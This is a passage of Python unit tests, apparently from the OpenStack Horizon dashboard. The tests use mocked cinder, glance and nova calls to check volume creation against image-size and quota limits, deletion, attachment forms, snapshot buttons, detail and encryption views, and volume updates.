self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def test_create_volume_from_image_under_image_size(self):
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 1, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
msg = ("The volume size cannot be less than the "
"image size (20.0\xa0GB)")
self.assertFormError(res, 'form', None, msg)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def _test_create_volume_from_image_under_image_min_disk_size(self, image):
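        # Shared helper: requesting a size smaller than the image's minimum
        # disk size must produce a form error instead of creating a volume.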
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 5, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"image minimum disk size (30GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
def test_create_volume_from_image_under_image_min_disk_size(self):
image = self.images.get(name="protected_images")
image.min_disk = 30
self._test_create_volume_from_image_under_image_min_disk_size(image)
def test_create_volume_from_image_under_image_prop_min_disk_size_v2(self):
image = self.imagesV2.get(name="protected_images")
self._test_create_volume_from_image_under_image_min_disk_size(image)
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_gb_used_over_alloted_quota(self):
formData = {'name': 'This Volume Is Huge!',
'description': 'This is a volume that is just too big!',
'method': 'CreateForm',
'size': 5000}
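        # Seed the quota usage so that only 20GiB of the 100GiB gigabyte
        # quota remains available for the oversized request above.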
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes', 6))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 80)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['A volume of 5000GiB cannot be created as you only'
' have 20GiB of your quota available.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_volume_list.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_number_over_alloted_quota(self):
formData = {'name': 'Too Many...',
'description': 'We have no volumes left!',
'method': 'CreateForm',
'size': 10}
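        # Consume the entire volume-count quota so the create form rejects
        # any additional volume.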
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes',
len(self.cinder_volumes.list())))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['You are already using all of your available'
' volumes.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume_with_group(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
volume_group = self.cinder_groups.list()[0]
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az,
'group': volume_group.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = self.cinder_groups.list()
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=volume_group.id, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_delete',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_delete_volume(self):
volumes = self.cinder_volumes.list()
volume = self.cinder_volumes.first()
formData = {'action':
'volumes__delete__%s' % volume.id}
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertIn("Scheduled deletion of Volume: Volume name",
[m.message for m in res.context['messages']])
self.mock_volume_list_paged.assert_called_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.assertEqual(2, self.mock_volume_snapshot_list.call_count)
self.mock_volume_delete.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_server_list.assert_called_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_delete_volume_with_snap_no_action_item(self, mock_get,
mock_limits,
mock_quotas):
volume = self.cinder_volumes.get(name='Volume name')
setattr(volume, 'has_snapshot', True)
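        # A volume that still has snapshots must not expose the delete action
        # in its table row.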
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
self.assertNotContains(res, 'Delete Volume')
self.assertNotContains(res, 'delete')
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments(self, mock_get, mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
        # The volume is already attached to the only attachable instance in
        # this tenant, so the form offers just the single placeholder choice.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments_auto_device_name(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_cannot_set_mount_point(self, mock_get,
mock_server_list):
        volume = self.cinder_volumes.first()
        servers = [s for s in self.servers.list()
                   if s.tenant_id == self.request.user.tenant_id]
        mock_get.return_value = volume
        mock_server_list.return_value = [servers, False]
        url = reverse('horizon:project:volumes:attach',
                      args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.HiddenInput)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_attached_volume(self, mock_get,
mock_server_list):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields['instance'].choices),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_attributes(self, mock_get,
mock_limits,
mock_quotas):
limits = {'maxTotalSnapshots': 2}
limits['totalSnapshotsUsed'] = 1
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertNotIn('disabled', content)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_disabled_when_quota_exceeded(
self, mock_get, mock_limits, mock_quotas):
limits = {'maxTotalSnapshots': 1}
limits['totalSnapshotsUsed'] = limits['maxTotalSnapshots']
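        # The snapshot quota is fully consumed, so the button must render
        # disabled.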
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot (Quota exceeded)', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertIn('disabled', content,
'The create snapshot button should be disabled')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_attributes(self):
limits = self.cinder_limits['absolute']
limits['maxTotalVolumes'] = 10
limits['totalVolumesUsed'] = 1
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertEqual(set(['ajax-modal', 'ajax-update', 'btn-create']),
set(create_action.classes))
self.assertEqual('Create Volume', create_action.verbose_name)
self.assertEqual('horizon:project:volumes:create', create_action.url)
self.assertEqual((('volume', 'volume:create'),),
create_action.policy_rules)
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), sort_dir='desc', marker=None,
paginate=True, search_opts=None)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
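        # The volume quota is fully consumed, so the Create Volume button
        # must render disabled.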
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertIn('disabled', create_action.classes,
'The create button should be disabled')
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['volume_snapshot_list',
'volume_get',
'tenant_absolute_limits'],
})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_server_get.assert_called_once_with(test.IsHttpRequest(),
server.id)
self.mock_tenant_absolute_limits.assert_called_once()
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_encrypted(self, mock_get, mock_encryption):
enc_meta = self.cinder_volume_encryption.first()
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.volume_type, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.provider, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.control_location, 1,
200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.cipher, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.key_size, 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_unencrypted(self, mock_get,
mock_encryption):
enc_meta = self.cinder_volume_encryption.list()[1]
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<h3>Volume is Unencrypted</h3>", 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_get_data(self, mock_get, mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
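        # With an empty name the row update should fall back to displaying
        # the volume ID as its name.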
mock_get.return_value = volume
mock_limits.return_value = self.cinder_limits['absolute']
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertEqual(volume.name, volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['tenant_absolute_limits',
'volume_get',
'volume_snapshot_list'],
})
def test_detail_view_snapshot_tab(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
this_volume_snapshots = [snapshot for snapshot in snapshots
if snapshot.volume_id == volume.id]
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
self.mock_volume_snapshot_list.return_value = this_volume_snapshots
url = '?'.join([reverse(DETAIL_URL, args=[volume.id]),
'='.join(['tab', 'volume_details__snapshots_tab'])])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertEqual(len(res.context['table'].data),
len(this_volume_snapshots))
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once()
@test.create_mocks({cinder: ['volume_get',
'message_list',
'volume_snapshot_list',
'tenant_absolute_limits']})
def test_detail_view_with_messages_tab(self):
volume = self.cinder_volumes.first()
messages = [msg for msg in self.cinder_messages.list()
if msg.resource_type == 'VOLUME']
snapshots = self.cinder_volume_snapshots.list()
self.mock_volume_get.return_value = volume
self.mock_message_list.return_value = messages
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse(DETAIL_URL, args=[volume.id])
detail_view = tabs.VolumeDetailTabs(self.request)
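        # Build the query string that selects the messages tab of the detail
        # view.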
messages_tab_link = "?%s=%s" % (
detail_view.param_name,
detail_view.get_tab("messages_tab").get_id())
url += messages_tab_link
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertContains(res, messages[0].user_message)
self.assertContains(res, messages[1].user_message)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once_with(
test.IsHttpRequest())
search_opts = {'resource_type': 'volume',
'resource_uuid': volume.id}
self.mock_message_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=search_opts)
@mock.patch.object(cinder, 'volume_get')
def test_detail_view_with_exception(self, mock_get):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
mock_get.side_effect = self.exceptions.cinder
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(
test.IsHttpRequest(), volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name, volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_without_name(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': '',
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, '', volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_bootable_flag(self):
volume = self.cinder_bootable_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': 'update bootable flag',
'bootable': True}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name,
'update bootable flag')
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, True)
@mock.patch.object(api.glance, 'get_image_schemas')
@mock.patch.object(cinder, 'volume_upload_to_image')
@mock.patch.object(cinder, 'volume_get')
def test_upload_to_image(self, mock_get, mock_upload, mock_schemas_list):
volume = self.cinder_volumes.get(name='v2_volume')
loaded_resp = {'container_format': 'bare',
'disk_format': 'raw',
'id': '741fe2ac-aa2f-4cec-82a9-4994896b43fb',
'image_id': '2faa080b-dd56-4bf0-8f0a-0d4627d8f306',
'image_name': 'test',
'size': '2',
'status': 'uploading'}
form_data = {'id': volume.id,
'name': volume.name,
'image_name': 'testimage',
'force': True,
'container_format': 'bare',
